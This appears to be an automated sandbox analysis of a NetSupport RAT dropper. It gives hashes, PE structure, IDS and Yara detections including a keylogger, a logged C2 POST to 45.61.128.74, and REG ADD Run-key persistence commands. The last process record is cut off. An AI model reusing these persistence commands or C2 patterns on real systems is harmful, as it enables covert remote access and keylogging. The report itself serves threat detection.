                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:file.exe
                                                                                      File size:2'283'788 bytes
                                                                                      MD5:a3cea314d888a08b79002656a9f4b927
                                                                                      SHA1:396b9f96219785f0c80c69703dc623c23554affc
                                                                                      SHA256:64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
                                                                                      SHA512:a279ce78302acb55f97181cf1bcd80982ca794995273af971c027fbb63b8ed7db14007ae0f84001d3a8b0502ca556cedb9ed4d6e95925bf853c2993f028b078d
                                                                                      SSDEEP:49152:kDjlabwz9F+H1Zf8NNbTfvaw2EheBgtpsDf5Log8nUQkFG534txeqJ:0qwPk1ZfWhvcEhQGa178UnFdJ
                                                                                      TLSH:CEB51209E3E909F5D0B7E53CCA668D02F77A7C5903309A8F23B0565A1F673A09E39761
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                                                      Icon Hash:1515d4d4442f2d2d
                                                                                      Entrypoint:0x140032ee0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:2
                                                                                      File Version Major:5
                                                                                      File Version Minor:2
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:2
                                                                                      Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                                      Instruction
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      call 00007F2368B75E38h
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      jmp 00007F2368B757CFh
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      mov eax, esp
                                                                                      dec eax
                                                                                      mov dword ptr [eax+08h], ebx
                                                                                      dec eax
                                                                                      mov dword ptr [eax+10h], ebp
                                                                                      dec eax
                                                                                      mov dword ptr [eax+18h], esi
                                                                                      dec eax
                                                                                      mov dword ptr [eax+20h], edi
                                                                                      inc ecx
                                                                                      push esi
                                                                                      dec eax
                                                                                      sub esp, 20h
                                                                                      dec ebp
                                                                                      mov edx, dword ptr [ecx+38h]
                                                                                      dec eax
                                                                                      mov esi, edx
                                                                                      dec ebp
                                                                                      mov esi, eax
                                                                                      dec eax
                                                                                      mov ebp, ecx
                                                                                      dec ecx
                                                                                      mov edx, ecx
                                                                                      dec eax
                                                                                      mov ecx, esi
                                                                                      dec ecx
                                                                                      mov edi, ecx
                                                                                      inc ecx
                                                                                      mov ebx, dword ptr [edx]
                                                                                      dec eax
                                                                                      shl ebx, 04h
                                                                                      dec ecx
                                                                                      add ebx, edx
                                                                                      dec esp
                                                                                      lea eax, dword ptr [ebx+04h]
                                                                                      call 00007F2368B74C53h
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      and al, 66h
                                                                                      neg al
                                                                                      mov eax, 00000001h
                                                                                      sbb edx, edx
                                                                                      neg edx
                                                                                      add edx, eax
                                                                                      test dword ptr [ebx+04h], edx
                                                                                      je 00007F2368B75963h
                                                                                      dec esp
                                                                                      mov ecx, edi
                                                                                      dec ebp
                                                                                      mov eax, esi
                                                                                      dec eax
                                                                                      mov edx, esi
                                                                                      dec eax
                                                                                      mov ecx, ebp
                                                                                      call 00007F2368B77977h
                                                                                      dec eax
                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                      dec eax
                                                                                      mov ebp, dword ptr [esp+38h]
                                                                                      dec eax
                                                                                      mov esi, dword ptr [esp+40h]
                                                                                      dec eax
                                                                                      mov edi, dword ptr [esp+48h]
                                                                                      dec eax
                                                                                      add esp, 20h
                                                                                      inc ecx
                                                                                      pop esi
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      sub esp, 48h
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                      call 00007F2368B641E3h
                                                                                      dec eax
                                                                                      lea edx, dword ptr [00025747h]
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                      call 00007F2368B76A32h
                                                                                      int3
                                                                                      jmp 00007F2368B7CC14h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe360.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x700000xe3600xe4002ce7b064b562668bb9f9675200fd1906False0.6302425986842105data6.596823435141548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      PNG0x706800xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                      PNG0x711c80x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                      RT_ICON0x727780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                      RT_ICON0x72ce00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                      RT_ICON0x735880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                      RT_ICON0x744300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                      RT_ICON0x748980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                      RT_ICON0x759400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                      RT_ICON0x77ee80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                      RT_DIALOG0x7c5b80x286dataEnglishUnited States0.5092879256965944
                                                                                      RT_DIALOG0x7c3880x13adataEnglishUnited States0.60828025477707
                                                                                      RT_DIALOG0x7c4c80xecdataEnglishUnited States0.6991525423728814
                                                                                      RT_DIALOG0x7c2580x12edataEnglishUnited States0.5927152317880795
                                                                                      RT_DIALOG0x7bf200x338dataEnglishUnited States0.45145631067961167
                                                                                      RT_DIALOG0x7bcc80x252dataEnglishUnited States0.5757575757575758
                                                                                      RT_STRING0x7cf980x1e2dataEnglishUnited States0.3900414937759336
                                                                                      RT_STRING0x7d1800x1ccdataEnglishUnited States0.4282608695652174
                                                                                      RT_STRING0x7d3500x1b8dataEnglishUnited States0.45681818181818185
                                                                                      RT_STRING0x7d5080x146dataEnglishUnited States0.5153374233128835
                                                                                      RT_STRING0x7d6500x46cdataEnglishUnited States0.3454063604240283
                                                                                      RT_STRING0x7dac00x166dataEnglishUnited States0.49162011173184356
                                                                                      RT_STRING0x7dc280x152dataEnglishUnited States0.5059171597633136
                                                                                      RT_STRING0x7dd800x10adataEnglishUnited States0.49624060150375937
                                                                                      RT_STRING0x7de900xbcdataEnglishUnited States0.6329787234042553
                                                                                      RT_STRING0x7df500x1c0dataEnglishUnited States0.5178571428571429
                                                                                      RT_STRING0x7e1100x250dataEnglishUnited States0.44256756756756754
                                                                                      RT_GROUP_ICON0x7bc600x68dataEnglishUnited States0.7019230769230769
                                                                                      RT_MANIFEST0x7c8400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665
                                                                                      DLLImport
                                                                                      KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                      gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-25T15:10:10.376773+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.64970845.61.128.74443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 15:10:19.136683941 CET49708443192.168.2.645.61.128.74
                                                                                      Nov 25, 2024 15:10:19.136734962 CET4434970845.61.128.74192.168.2.6
                                                                                      Nov 25, 2024 15:10:19.136810064 CET49708443192.168.2.645.61.128.74
                                                                                      Nov 25, 2024 15:10:19.369698048 CET49708443192.168.2.645.61.128.74
                                                                                      Nov 25, 2024 15:10:19.369761944 CET4434970845.61.128.74192.168.2.6
                                                                                      Nov 25, 2024 15:10:19.369818926 CET4434970845.61.128.74192.168.2.6
                                                                                      Nov 25, 2024 15:10:20.133939028 CET4970980192.168.2.6104.26.0.231
                                                                                      Nov 25, 2024 15:10:20.257781029 CET8049709104.26.0.231192.168.2.6
                                                                                      Nov 25, 2024 15:10:20.258264065 CET4970980192.168.2.6104.26.0.231
                                                                                      Nov 25, 2024 15:10:20.258656979 CET4970980192.168.2.6104.26.0.231
                                                                                      Nov 25, 2024 15:10:20.381143093 CET8049709104.26.0.231192.168.2.6
                                                                                      Nov 25, 2024 15:10:21.664592981 CET8049709104.26.0.231192.168.2.6
                                                                                      Nov 25, 2024 15:10:21.664655924 CET4970980192.168.2.6104.26.0.231
                                                                                      Nov 25, 2024 15:12:09.953752041 CET4970980192.168.2.6104.26.0.231
                                                                                      Nov 25, 2024 15:12:10.074353933 CET8049709104.26.0.231192.168.2.6
                                                                                      Nov 25, 2024 15:12:10.075824022 CET4970980192.168.2.6104.26.0.231
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 15:10:19.987565994 CET6117853192.168.2.61.1.1.1
                                                                                      Nov 25, 2024 15:10:20.128518105 CET53611781.1.1.1192.168.2.6
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 15:10:19.987565994 CET192.168.2.61.1.1.10xe5aStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 15:10:20.128518105 CET1.1.1.1192.168.2.60xe5aNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 15:10:20.128518105 CET1.1.1.1192.168.2.60xe5aNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 15:10:20.128518105 CET1.1.1.1192.168.2.60xe5aNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                      • 45.61.128.74connection: keep-alivecmd=pollinfo=1ack=1
                                                                                      • geo.netsupportsoftware.com
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.64970845.61.128.744435552C:\Users\Public\Netstat\shv.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 15:10:19.369698048 CET216OUTPOST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                      Data Raw:
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.649709104.26.0.231805552C:\Users\Public\Netstat\shv.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 15:10:20.258656979 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                      Host: geo.netsupportsoftware.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Nov 25, 2024 15:10:21.664592981 CET967INHTTP/1.1 200 OK
                                                                                      Date: Mon, 25 Nov 2024 14:10:21 GMT
                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      CF-Ray: 8e8238c26c18728a-EWR
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: private
                                                                                      Set-Cookie: ASPSESSIONIDCQRCRQBQ=BFBLMHACADDDDOIFGMKPCBBO; path=/
                                                                                      cf-apo-via: origin,host
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Powered-By: ASP.NET
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSVCf65P8D36UWnm6YIitQ%2FuvOOjwF%2BnLQxXxsmTL0zqoTl7yEO8SSJnaL%2BNSsHwL%2ByG00ecNy7iAYlTOmrmqoRZwsHC1yxgvmbA0cwOvOTndzaxWCXYAat2oyD%2FaQ6vLPyD7M4nN8pbzjwi"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1040.7357,-74.17240


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:09:10:15
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                      Imagebase:0x7ff70e780000
                                                                                      File size:2'283'788 bytes
                                                                                      MD5 hash:A3CEA314D888A08B79002656A9F4B927
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:09:10:16
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                                                      Imagebase:0x7ff645890000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:09:10:16
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:09:10:16
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff632860000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:09:10:17
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff632860000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:09:10:17
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Netstat\shv.exe
                                                                                      Imagebase:0xab0000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 29%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:09:10:17
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff632860000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:09:10:18
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff632860000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:09:10:18
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Netstat\shv.exe
                                                                                      Imagebase:0xab0000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:09:10:28
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xab0000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
